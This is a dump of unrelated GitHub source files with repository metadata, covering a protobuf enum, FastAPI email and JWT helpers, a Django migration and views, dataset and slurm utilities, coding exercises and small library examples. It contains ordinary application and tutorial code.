ephraimbuddy/airflow
|
238d6170a0e4f76456f00423124a260527960710
|
3193857376bc2c8cd2eb133017be1e8cbcaa8405
|
refs/heads/main
| 2023-05-29T05:37:44.992278 | 2023-05-13T19:49:43 | 2023-05-13T19:49:43 | 245,751,695 | 2 | 1 |
Apache-2.0
| 2021-05-20T08:10:14 | 2020-03-08T04:28:27 | null |
UTF-8
|
Python
| false | false | 1,509 |
py
|
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package="airflow.providers.google_vendor.googleads.v12.errors",
marshal="google.ads.googleads.v12",
manifest={"CampaignFeedErrorEnum",},
)
class CampaignFeedErrorEnum(proto.Message):
r"""Container for enum describing possible campaign feed errors.
"""
class CampaignFeedError(proto.Enum):
r"""Enum describing possible campaign feed errors."""
UNSPECIFIED = 0
UNKNOWN = 1
FEED_ALREADY_EXISTS_FOR_PLACEHOLDER_TYPE = 2
CANNOT_CREATE_FOR_REMOVED_FEED = 4
CANNOT_CREATE_ALREADY_EXISTING_CAMPAIGN_FEED = 5
CANNOT_MODIFY_REMOVED_CAMPAIGN_FEED = 6
INVALID_PLACEHOLDER_TYPE = 7
MISSING_FEEDMAPPING_FOR_PLACEHOLDER_TYPE = 8
NO_EXISTING_LOCATION_CUSTOMER_FEED = 9
LEGACY_FEED_TYPE_READ_ONLY = 10
__all__ = tuple(sorted(__protobuf__.manifest))
|
[
"[email protected]"
] | |
18d4a948b0ca382c4d01997d274c1deb0cbccddf
|
b92226895d04b0258981864e8604720de9c09f4d
|
/src/utils.py
|
3200a377f749da6ea1b234e191737060009fa795
|
[
"BSD-3-Clause"
] |
permissive
|
aydinmemis/blog_FastAPI
|
e42a6c4f5a9c64154da0f9a23290c274b305838a
|
f584634a2cd410904df6a7d9478044d269737a91
|
refs/heads/master
| 2022-04-06T12:37:59.068303 | 2020-03-11T18:04:14 | 2020-03-11T18:04:14 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,688 |
py
|
import logging
from datetime import datetime, timedelta
from pathlib import Path
from typing import Optional
import emails
import jwt
from emails.template import JinjaTemplate
from jwt.exceptions import InvalidTokenError
from core import config
password_reset_jwt_subject = "preset"
def send_email(email_to: str, subject_template="", html_template="", environment={}):
assert config.EMAILS_ENABLED, "no provided configuration for email variables"
message = emails.Message(
subject=JinjaTemplate(subject_template),
html=JinjaTemplate(html_template),
mail_from=(config.EMAILS_FROM_NAME, config.EMAILS_FROM_EMAIL),
)
smtp_options = {"host": config.SMTP_HOST, "port": config.SMTP_PORT}
if config.SMTP_TLS:
smtp_options["tls"] = True
if config.SMTP_USER:
smtp_options["user"] = config.SMTP_USER
if config.SMTP_PASSWORD:
smtp_options["password"] = config.SMTP_PASSWORD
response = message.send(to=email_to, render=environment, smtp=smtp_options)
logging.info(f"send email result: {response}")
def send_test_email(email_to: str):
project_name = config.PROJECT_NAME
subject = f"{project_name} - Test email"
with open(Path(config.EMAIL_TEMPLATES_DIR) / "test_email.html") as f:
template_str = f.read()
send_email(
email_to=email_to,
subject_template=subject,
html_template=template_str,
environment={"project_name": config.PROJECT_NAME, "email": email_to},
)
def send_reset_password_email(email_to: str, email: str, token: str):
project_name = config.PROJECT_NAME
subject = f"{project_name} - Password recovery for user {email}"
with open(Path(config.EMAIL_TEMPLATES_DIR) / "reset_password.html") as f:
template_str = f.read()
if hasattr(token, "decode"):
use_token = token.decode()
else:
use_token = token
server_host = config.SERVER_HOST
link = f"{server_host}/reset-password?token={use_token}"
send_email(
email_to=email_to,
subject_template=subject,
html_template=template_str,
environment={
"project_name": config.PROJECT_NAME,
"username": email,
"email": email_to,
"valid_hours": config.EMAIL_RESET_TOKEN_EXPIRE_HOURS,
"link": link,
},
)
def send_new_account_email(email_to: str, username: str, password: str):
project_name = config.PROJECT_NAME
subject = f"{project_name} - New account for user {username}"
with open(Path(config.EMAIL_TEMPLATES_DIR) / "new_account.html") as f:
template_str = f.read()
link = config.SERVER_HOST
send_email(
email_to=email_to,
subject_template=subject,
html_template=template_str,
environment={
"project_name": config.PROJECT_NAME,
"username": username,
"password": password,
"email": email_to,
"link": link,
},
)
def generate_password_reset_token(email):
delta = timedelta(hours=config.EMAIL_RESET_TOKEN_EXPIRE_HOURS)
now = datetime.utcnow()
expires = now + delta
exp = expires.timestamp()
encoded_jwt = jwt.encode(
{"exp": exp, "nbf": now, "sub": password_reset_jwt_subject, "email": email},
config.SECRET_KEY,
algorithm="HS256",
)
return encoded_jwt
def verify_password_reset_token(token) -> Optional[str]:
try:
decoded_token = jwt.decode(token, config.SECRET_KEY, algorithms=["HS256"])
assert decoded_token["sub"] == password_reset_jwt_subject
return decoded_token["email"]
except InvalidTokenError:
return None
|
[
"[email protected]"
] | |
8179861a56b00ea0aae727ab31ba65679ea3dcb6
|
5c0e83b07e01983b064980b805e6067cd1123714
|
/rd_caltech.py
|
81e59b15ea802ee43b2828b30359ef9bfbe9dc85
|
[
"MIT"
] |
permissive
|
zyg11/MTCNN-TF
|
750ec7b6533b639deba5126e19a434da615585ac
|
4d41c5fd2dc13008d39b868aa2e921a7ff731e10
|
refs/heads/master
| 2020-08-26T14:24:41.084820 | 2019-04-02T09:02:23 | 2019-04-02T09:02:23 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,656 |
py
|
#author : lxy
#time: 2018.3.23/ 11:30:00
#tool: python3
#version: 0.1
#modify:
#project: pedestrian detection
################################
import numpy as np
import glob
import os
import argparse
def args():
parser = argparse.ArgumentParser(description="read caltech txt")
parser.add_argument('--dir_in',type=str,default="/home/lxy/Downloads/DataSet/trainval/",\
help='annotation files saved dir ')
parser.add_argument('--out_file',type=str,default='train_caltech.txt',\
help='generated outfiles saved')
return parser.parse_args()
def get_fil():
parm = args()
dir_in = parm.dir_in
out_f = parm.out_file
f_wt = open(out_f,'w')
file_txts = glob.glob(dir_in+'annotations/*.txt')
pass_cnt = 0
for file_item in file_txts:
f_rd = open(file_item,'r')
line_list = f_rd.readlines()
if len(line_list)==0:
f_rd.close()
print("empyt file: ",file_item)
pass_cnt+=1
continue
img_split = file_item.split('/')
img_name = img_split[-1][:-4]
img_lists = glob.glob(dir_in+'images/*')
for img_one in img_lists:
img_lists_split = img_one.split('/')
img_one_name = img_lists_split[-1]
if img_name in img_one_name:
img_name = img_one_name
f_wt.write("{} ".format(img_name))
for line in line_list:
line = line.strip()
f_wt.write("{} ".format(line[1:]))
f_wt.write("\n")
f_rd.close()
f_wt.close()
print("pass ",pass_cnt)
if __name__=="__main__":
get_fil()
|
[
"[email protected]"
] | |
f099e8563d50a673936df3dfddd48a1bcda5b76d
|
2b3ed6bef2f569448918b8be72c733614c231fce
|
/hdf5_example.py
|
dd3342f3c57d95a4688d33cb9ed830c521fb325f
|
[] |
no_license
|
jackdbd/dask-playground
|
8e67024ba60fbac3ff1ad77b94363731c04c0afd
|
721bc234eadf13e9ef24173bbbc9a68761bf1a7c
|
refs/heads/master
| 2021-04-25T19:58:47.303280 | 2017-11-01T12:49:00 | 2017-11-01T12:49:00 | 109,123,767 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 554 |
py
|
import os
import h5py
import numpy as np
import dask.array as da
h5file_path = 'myfile.hdf5'
if os.path.exists(h5file_path):
os.unlink(h5file_path)
# create a continuous uniform distribution between 0.0 and 1.0
arr = np.random.random(size=(10000, 2000))
with h5py.File(h5file_path, 'w') as h5f:
h5f.create_dataset('dataset_1', data=arr)
with h5py.File(h5file_path, 'r') as h5f:
dset = h5f['dataset_1'][:]
x = da.from_array(dset, chunks=(1000, 1000))
result = x.mean().compute()
print(result) # should be pretty clonse to 0.5
|
[
"[email protected]"
] | |
b70471b30ed693024129232b607386dcc2056eed
|
4d05be863b63a56a90b4c46b15069827b33ecaae
|
/Algorithms/leetcode/088_merge_sorted_array.py
|
cdc7c4756f42f6563a0e1d9faa78195016a55fbc
|
[] |
no_license
|
leeo1116/PyCharm
|
e532fa9754056019508cc454214ee1a8ad9b26a9
|
b6942c05c27556e5fe47879e8b823845c84c5430
|
refs/heads/master
| 2022-11-06T00:43:14.882453 | 2017-07-13T04:50:00 | 2017-07-13T04:50:00 | 36,851,636 | 0 | 1 | null | 2022-10-20T10:44:39 | 2015-06-04T06:09:09 |
Python
|
UTF-8
|
Python
| false | false | 775 |
py
|
__author__ = 'Liang Li'
class Solution:
# @param {integer[]} nums1
# @param {integer} m
# @param {integer[]} nums2
# @param {integer} n
# @return {void} Do not return anything, modify nums1 in-place instead.
def merge(self, nums1, m, nums2, n):
i = m-1
j = n-1
k = m+n-1
while i >= 0 and j >= 0:
if nums1[i] > nums2[j]:
nums1[k] = nums1[i]
i -= 1
k -= 1
else:
nums1[k] = nums2[j]
j -= 1
k -= 1
while j >= 0:
nums1[k] = nums2[j]
j -= 1
k -= 1
s = Solution()
nums1 = [2, 5, 8, 12, 0, 0, 0, 0]
nums2 = [1, 3, 4, 10]
s.merge(nums1, 4, nums2, 4)
print(nums1)
|
[
"[email protected]"
] | |
2316ed9192f542f72a25d3038b16c60e3271862f
|
68b7d7b72a9d87123373f1e4523bf3655564769d
|
/backend/course/migrations/0001_initial.py
|
0ce22a04074cfc9aad1aacd1a19265b0239921a5
|
[] |
no_license
|
crowdbotics-apps/help-procrastinatio-22418
|
c5a85b31e85b87e9d4e39f402ca3f037d916c990
|
b2a967a5b930ba5cacbeeea702ca9aba71899687
|
refs/heads/master
| 2023-01-09T12:19:42.589420 | 2020-11-08T23:45:22 | 2020-11-08T23:45:22 | 311,177,250 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,517 |
py
|
# Generated by Django 2.2.17 on 2020-11-08 23:44
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=256)),
],
),
migrations.CreateModel(
name='Course',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(blank=True, max_length=256, null=True)),
('description', models.TextField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='course_author', to=settings.AUTH_USER_MODEL)),
('categories', models.ManyToManyField(blank=True, related_name='course_categories', to='course.Category')),
],
),
migrations.CreateModel(
name='Event',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=256)),
('date', models.DateTimeField()),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='event_user', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Group',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=256)),
],
),
migrations.CreateModel(
name='SubscriptionType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=256)),
],
),
migrations.CreateModel(
name='Subscription',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('subscription_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='subscription_subscription_type', to='course.SubscriptionType')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='subscription_user', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Recording',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('media', models.URLField()),
('published', models.DateTimeField()),
('event', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='recording_event', to='course.Event')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='recording_user', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='PaymentMethod',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('primary', models.BooleanField()),
('token', models.CharField(max_length=256)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='paymentmethod_user', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Module',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=256)),
('description', models.TextField()),
('course', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='module_course', to='course.Course')),
],
),
migrations.CreateModel(
name='Lesson',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=256)),
('description', models.TextField()),
('media', models.URLField()),
('module', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='lesson_module', to='course.Module')),
],
),
migrations.CreateModel(
name='Enrollment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('course', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='enrollment_course', to='course.Course')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='enrollment_user', to=settings.AUTH_USER_MODEL)),
],
),
]
|
[
"[email protected]"
] | |
99681c36be3784e520c6d493f540d54bbb5b6ac4
|
d8a5fc2195165c970e2340eee87ae2ad5322da29
|
/{{cookiecutter.repo_name}}/{{cookiecutter.project_name}}/photos/views.py
|
48573cfdc703cc624f8d89eccaf4fa0037280c73
|
[
"BSD-3-Clause"
] |
permissive
|
lendlsmith/chrisdev-cookiecutter
|
b76e6194aa8369c2dbf1dac73e3282e025d2b146
|
e0ab2d16bd1a066800ce46bb1740b1254c259a70
|
refs/heads/master
| 2021-10-11T22:20:02.391847 | 2014-07-21T16:57:32 | 2014-07-21T16:57:32 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 644 |
py
|
from django.views.generic import ListView, DetailView
from filer.models import Folder
class GalleryListView(ListView):
#context_object_name = "gallery_list"
try:
queryset = Folder.objects.get(
name='Gallery').children.all().order_by('-created_at')
except Folder.DoesNotExist:
queryset = None
template_name = "gallery/gallery_archive.html"
class GalleryDetailView(DetailView):
#context_object_name = "gallery"
try:
queryset = Folder.objects.get(name='Gallery').children.all()
except Folder.DoesNotExist:
queryset = None
template_name = "gallery/gallery_detail.html"
|
[
"[email protected]"
] | |
4528a59aa0db7486bbbf2a3cb6b8db98636d7a1b
|
17e60f61fc82e7369802a1c597b58b0206ad9bec
|
/lib/poolLoop.py
|
0a25964115c941e48f0dbddf08013eda3d965d6c
|
[] |
no_license
|
SLB-DeN/opensvc
|
5e06d42947f51662fa16203a00670a88b9e1fea9
|
75baeb19e0d26d5e150e770aef4d615c2327f32e
|
refs/heads/master
| 2021-05-17T05:35:18.585791 | 2020-03-19T15:20:05 | 2020-03-19T15:20:05 | 250,651,667 | 1 | 0 | null | 2020-03-27T21:29:22 | 2020-03-27T21:29:22 | null |
UTF-8
|
Python
| false | false | 1,366 |
py
|
from __future__ import print_function
import os
import pool
import rcExceptions as ex
from rcUtilities import lazy, justcall
class Pool(pool.Pool):
type = "loop"
capabilities = ["rox", "rwx", "roo", "rwo", "blk"]
@lazy
def path(self):
return self.oget("path")
def translate(self, name=None, size=None, fmt=True, shared=False):
data = [
{
"rtype": "disk",
"type": "loop",
"file": os.path.join(self.path, "%s.img" % name),
"size": size,
}
]
if fmt:
data += self.add_fs(name, shared)
return data
def pool_status(self):
from converters import convert_size
if not os.path.exists(self.path):
os.makedirs(self.path)
data = {
"name": self.name,
"type": self.type,
"capabilities": self.capabilities,
}
cmd = ["df", "-P", self.path]
out, err, ret = justcall(cmd)
if ret != 0:
return data
l = out.splitlines()[-1].split()
data["free"] = convert_size(l[3], default_unit="K", _to="k")
data["used"] = convert_size(l[2], default_unit="K", _to="k")
data["size"] = convert_size(l[1], default_unit="K", _to="k")
data["head"] = self.path
return data
|
[
"[email protected]"
] | |
9498aefa8f146488465c0dc49bcdcfecb6c2c61c
|
3b84c4b7b16ccfd0154f8dcb75ddbbb6636373be
|
/google-cloud-sdk/lib/googlecloudsdk/surface/compute/resource_views/resources/add.py
|
91a1766af1560f7ca696cc64491c0c49bb5e745d
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
twistedpair/google-cloud-sdk
|
37f04872cf1ab9c9ce5ec692d2201a93679827e3
|
1f9b424c40a87b46656fc9f5e2e9c81895c7e614
|
refs/heads/master
| 2023-08-18T18:42:59.622485 | 2023-08-15T00:00:00 | 2023-08-15T12:14:05 | 116,506,777 | 58 | 24 | null | 2022-02-14T22:01:53 | 2018-01-06T18:40:35 |
Python
|
UTF-8
|
Python
| false | false | 2,988 |
py
|
# Copyright 2014 Google Inc. All Rights Reserved.
"""'resourceviews resources add' command."""
from apiclient import errors
from googlecloudsdk.api_lib.compute import rolling_updates_util as util
from googlecloudsdk.calliope import base
from googlecloudsdk.calliope import exceptions
from googlecloudsdk.core import log
from googlecloudsdk.core import properties
class Add(base.Command):
"""Add resources to a resource view."""
@staticmethod
def Args(parser):
"""Args is called by calliope to gather arguments for this command.
Args:
parser: An argparse parser that you can use to add arguments that go
on the command line after this command. Positional arguments are
allowed.
"""
parser.add_argument(
'resource',
nargs='+',
help=('A list of fully-qualified URLs to each resource that should '
'be added to this view. For example: '
'https://www.googleapis.com/compute/v1/projects/myproject/'
'zones/us-central1-a/instances/instance-1'))
def Run(self, args):
"""Run 'resourceviews resources add'.
Args:
args: argparse.Namespace, The arguments that this command was invoked
with.
Raises:
HttpException: A http error response was received while executing api
request.
ToolException: An error other than http error occured while executing
the command.
"""
zone_views_client = self.context['zoneViewsClient']
region_views_client = self.context['regionViewsClient']
project = properties.VALUES.core.project.Get(required=True)
request_body = {'resources': args.resource}
if 'v1beta1' in self.context['api_version']:
if args.region:
request = region_views_client.addresources(
projectName=project,
region=args.region,
resourceViewName=args.resourceview,
body=request_body)
else:
request = zone_views_client.addresources(
projectName=project,
zone=args.zone,
resourceViewName=args.resourceview,
body=request_body)
else:
request = zone_views_client.addResources(
project=project,
zone=args.zone,
resourceView=args.resourceview,
body=request_body)
try:
request.execute()
log.Print('Resources added to resource view {0}.'.format(
args.resourceview))
except errors.HttpError as error:
raise exceptions.HttpException(util.GetError(error))
except errors.Error as error:
raise exceptions.ToolException(error)
Add.detailed_help = {
'brief': 'Add resources to a resource view.',
'DESCRIPTION': """\
This command adds resources to a resource view. You must provide a
list of fully-qualified URLs for each resource.
Alternatively, you can also use the addinstances command and provide
resource names rather than URLs.
""",
}
|
[
"[email protected]"
] | |
f57a5a411bc4bd9daee914c2fc13faf4310bdc9b
|
97ca8aedfc7959f99bf5add51c2fbb9d535c5aff
|
/tcml_tools/slurmer/parse/group.py
|
6142cd427c107f81a3ddab7c8eda3c9d7558ae77
|
[] |
no_license
|
cogsys-tuebingen/tcml_tools
|
74b930b8109ef0ad559584bb51808edb83fe4e8c
|
4eabeb08e34993143c729136dc4349043dde00ad
|
refs/heads/main
| 2023-06-02T02:27:13.915943 | 2021-06-09T07:01:23 | 2021-06-09T07:01:23 | 359,801,189 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,582 |
py
|
import numpy as np
from typing import Union
from collections import OrderedDict, defaultdict
from tcml_tools.slurmer.parse import Result, Metrics
class Group:
"""
A group of slurm jobs that share parameters (except e.g. seed)
metrics will be computed over groups
"""
default_result = Result("__default__", -1, float_acc=1)
all_param_keys = OrderedDict()
all_result_keys = OrderedDict()
def __init__(self, name: str, ids: list, **kwargs):
self.name = name
self.ids = [int(i) for i in ids]
self.params = kwargs
self.data = defaultdict(dict)
self.results = OrderedDict()
for k in kwargs.keys():
Group.all_param_keys[k] = True
def get(self, key: str, default=None):
""" get param/result, or default otherwise """
if key in self.params:
return self.params.get(key)
if key in self.results:
return self.results.get(key).value
return default
def get_param_tuple(self, skip_keys=()) -> tuple:
""" get a tuple of all parameter-values, except for the skipped ones """
return tuple([self.params.get(k, '') for k in self.all_param_keys.keys() if k not in skip_keys])
@staticmethod
def __filter(dct: OrderedDict, ignore_keys=()) -> OrderedDict:
new_dct = dct.copy()
for key in ignore_keys:
new_dct.pop(key, None)
return new_dct
@staticmethod
def sorted_param_keys(**filter_kwargs):
""" all known parameter keys of all groups """
return sorted([k for k in Group.__filter(Group.all_param_keys, **filter_kwargs).keys()])
def merge(self, other: 'Group'):
""" merge another group into this one, keep this name """
self.ids.extend(other.ids)
self.params.update(other.params)
self.data.update(other.data)
l0, l1 = len(self.results), len(other.results)
self.results.update(other.results)
assert len(self.results) == l0+l1, "Some results were overwritten by merging!"
def update_all_data(self, data: {str: dict}):
""" updates the data of all group members that are in the data dict """
for id_ in self.ids:
if id_ in data:
self.data[id_].update(data.get(id_))
def update_data(self, id_: int, data: dict):
""" updates the data of group member with slurm id """
self.data[id_].update(data)
def update_results(self, metrics: [Metrics]):
for m in metrics:
values, missing = self._values(key=m.get_key(), last_k=m.last_k)
try:
for result in m.from_values(values):
self.results[result.name] = max([result, self.results.get(result.name)])
Group.all_result_keys[result.name] = True
except KeyError:
raise KeyError('Missing key "%s" in: %s, but the metric requires it' % (m.get_key(), missing))
def _values(self, key: str, last_k=-1) -> (Union[np.array, None], list):
"""
all values, different group members on axis 0, time series on axis 1, (can be None)
and a list of slurm ids where the values are missing
"""
values = []
missing = []
for id_, data in self.data.items():
if key not in data:
missing.append(id_)
continue
v = np.array([v[2] for v in data.get(key)]) # tensorboard has (step, time, value) triplets
if isinstance(last_k, int) and (last_k > 0):
v = v[-last_k:]
values.append(v)
assert all([len(v) == len(values[0]) for v in values]), "different value-array lengths for key=%s" % key
if len(values) > 0:
return np.stack(values, axis=0), missing
return None, missing
def __header_dict(self, separator: str, **filter_kwargs) -> dict:
# param_keys = Group.sorted_param_keys(**filter_kwargs)
param_keys = list(self.__filter(self.all_param_keys, **filter_kwargs).keys())
value_keys = list(self.__filter(self.all_result_keys, **filter_kwargs).keys())
return {
'n': 'name',
'ids': 'slurm_ids',
'params': separator.join(param_keys),
'values': separator.join(value_keys),
}
def __table_dict(self, separator: str, **filter_kwargs) -> dict:
# param_keys = Group.sorted_param_keys(**filter_kwargs)
param_keys = list(self.__filter(self.all_param_keys, **filter_kwargs).keys())
value_keys = list(self.__filter(self.all_result_keys, **filter_kwargs).keys())
return {
'n': self.name,
'ids': str(self.ids),
'params': separator.join([str(self.params.get(k, '')) for k in param_keys]),
'values': separator.join([self.results.get(k, self.default_result).str for k in value_keys]),
}
def get_csv_str_header(self, **filter_kwargs) -> str:
""" table csv header, e.g. for libre office calc """
return '{n};{ids};;{params};;{values};'.format(**self.__header_dict(';', **filter_kwargs))
def get_csv_str(self, **filter_kwargs) -> str:
""" table csv row, e.g. for libre office calc, printing params and the metric values """
return '{n};{ids};;{params};;{values};'.format(**self.__table_dict(';', **filter_kwargs))
def get_latex_str_header(self, **filter_kwargs) -> str:
""" table header for latex """
return '{n} & {params} & {values} \\\\'.format(**self.__header_dict(' & ', **filter_kwargs)).replace('_', '\_')
def get_latex_str(self, **filter_kwargs) -> str:
""" table row for latex, printing params and the metric values """
return '{n} & {params} & {values} \\\\'.format(**self.__table_dict(' & ', **filter_kwargs)).replace('_', '\_')
class GroupSeparator(Group):
"""
simple hack to just insert a midrule into latex tables, and empty rows into csv data
will probably break everything if added first to a GroupManager, so don't do that
"""
_id = -1
def __init__(self, **kwargs):
self._id += 1
super().__init__('separator %d' % self._id, [], **kwargs)
def update_results(self, metrics):
pass
def get_csv_str(self, **filter_kwargs) -> str:
""" table row for libre office calc, printing params and the metric values """
return ''
def get_latex_str(self, **filter_kwargs) -> str:
""" table row for latex, printing params and the metric values """
return '\\midrule'
|
[
"[email protected]"
] | |
e5f98ccd8f816d3621fa6a5b9fd0132e0965826b
|
30a89ae47ca79e4ced151908f4059cd77ade30ef
|
/order/forms.py
|
0c700dce796932a329f19a1102f5113624a6fcd8
|
[] |
no_license
|
harshit8858/mindful_project1_salesapp
|
0bd80c40b2349fe08744dcd0625283c5b6ba4029
|
66f7c7af868518898aa6422d1b17ca9f7cf433ef
|
refs/heads/master
| 2020-03-24T00:02:49.972583 | 2018-08-18T07:56:49 | 2018-08-18T07:56:49 | 142,269,897 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 328 |
py
|
from django import forms
from .models import *
class OrderForm(forms.ModelForm):
class Meta:
model = Order
fields = [
'customer',
'remark',
'product',
'quantity',
'price',
'discount',
'tax',
'total',
]
|
[
"[email protected]"
] | |
8f4e42b65ce09e4a562f2d4b298babce0fd4be3b
|
2417d9f6afe95ba19354c65bfb400556f2eb2e19
|
/setup.py
|
2a91c65f19fbb3863f4728098116fca13710074a
|
[
"Apache-2.0"
] |
permissive
|
rakeshnb/pixiedust
|
39f1249a867719919441488f085e1f60519dae58
|
fb5198c7564589c267147d7bdee1f798e7b361ef
|
refs/heads/master
| 2020-05-23T08:09:42.603871 | 2016-10-07T22:08:10 | 2016-10-07T22:08:10 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 732 |
py
|
from setuptools import setup
setup(name='pixiedust',
version='0.38',
description='Misc helpers for Spark Python Notebook',
url='https://github.com/ibm-cds-labs/pixiedust',
install_requires=['maven-artifact','mpld3'],
author='David Taieb',
author_email='[email protected]',
license='Apache 2.0',
packages=['pixiedust','pixiedust.packageManager','pixiedust.display',
'pixiedust.display.table','pixiedust.display.graph','pixiedust.display.chart','pixiedust.display.chart.plugins',
'pixiedust.display.tests','pixiedust.display.download',
'pixiedust.services',
'pixiedust.utils'],
include_package_data=True,
zip_safe=False)
|
[
"[email protected]"
] | |
aea5124f9f2718dae828e8f08e419c0c88fa27e0
|
1d60c5a7b8ce6277bff514e376f79848f706344c
|
/Data Analyst with Python - Career Track/01. Introduction to Data Science in Python/04. Different Types of Plots/05. Modifying histograms.py
|
1ce32da1b97d613df25adfdb3b264ed5dbd7b8c8
|
[] |
no_license
|
DidiMilikina/DataCamp
|
338c6e6d3b4f5b6c541c1aba155a36e9ee24949d
|
3bf2cf3c1430190a7f8e54efda7d50a5fd66f244
|
refs/heads/master
| 2020-12-15T13:16:54.178967 | 2020-05-06T17:30:54 | 2020-05-06T17:30:54 | 235,113,616 | 4 | 3 | null | null | null | null |
UTF-8
|
Python
| false | false | 764 |
py
|
'''
Modifying histograms
Let's explore how changes to keyword parameters in a histogram can change the output. Recall that:
range sets the minimum and maximum datapoints that we will include in our histogram.
bins sets the number of points in our histogram.
We'll be exploring the weights of various puppies from the DataFrame puppies. matplotlib has been loaded under the alias plt.
Instructions 1/3
35 XP
Create a histogram of the column weight from the DataFrame puppies.
Change the number of bins to 50.
Change the range to start at 5 and end at 35.
'''
SOLUTION
# Change the range to start at 5 and end at 35
plt.hist(puppies.weight,
range=(5, 35))
# Add labels
plt.xlabel('Puppy Weight (lbs)')
plt.ylabel('Number of Puppies')
# Display
plt.show()
|
[
"[email protected]"
] | |
5e95d15bbcb402658a0aa5ca152150228122ffa4
|
88be3911c7e73d4bf71b0482ee6d15f49030463a
|
/SEC31_Regex/Demo_findall.py
|
efd4979649d52b8aed3afc6af63204120a6ce980
|
[] |
no_license
|
skyaiolos/Python_KE
|
85f879d1cb637debd2e3a0239d7c8d7bfb30c827
|
8cc42c8f4d1245de4b79af429f72a9ed2508bc1a
|
refs/heads/master
| 2021-01-22T08:47:47.761982 | 2017-05-28T14:57:02 | 2017-05-28T14:57:02 | 92,634,507 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,028 |
py
|
"""
# Script Description:
Python 正则表达式之RegexObject
"""
__author__ = "爱的彼岸(QQ:3124724)"
__copyright__ = "Copyright 2017,[email protected]"
# Create by Jianguo on 2017/5/7
import re
text = "Tom is 8 years old, Mike is 25 years old."
# 模式对象, 表现编译后的正则表达式(编译为字节码并缓存)
# re.compile(r'模式')
print('findall()'.center(100, '*'))
pattern = re.compile(r'\d+')
print(pattern.findall(text))
print(re.findall(r'\d+', text))
s = "\\author:Tom"
pattern = re.compile(r'\\author')
rex = pattern.findall(s)
print(rex)
text = "Tom is 8 years old, Mike is 25 years old.Peter is 87 years old."
pattern = re.compile(r'\d+')
rex = pattern.findall(text)
print(rex)
p_name = re.compile(r'[A-Z]\w+')
rex_p = p_name.findall(text)
print(rex_p)
p1 = re.compile(r'\d+')
p2 = re.compile(r'[A-Z]\w+')
print('findall() VS finditer()'.center(100, '*'))
print(p1.findall(text))
print()
print('finditer()'.center(30, '*'))
it = p1.finditer(text)
for item in it:
print(item)
|
[
"[email protected]"
] | |
21a700bb20d695f0545a44e8ea56ccd2d5c1ecbd
|
d82ac08e029a340da546e6cfaf795519aca37177
|
/chapter_13_parallel_nn_training_theano/02_array_structures.py
|
041b18247a74fa59fe0cfc17db87096150e8cf80
|
[] |
no_license
|
CSwithJC/PythonMachineLearning
|
4409303c3f4d4177dc509c83e240d7a589b144a0
|
0c4508861e182a8eeacd4645fb93b51b698ece0f
|
refs/heads/master
| 2021-09-04T04:28:14.608662 | 2018-01-15T20:25:36 | 2018-01-15T20:25:36 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 566 |
py
|
import theano
import numpy as np
from theano import tensor as T
# Config Theano to use 32-bit architecture:
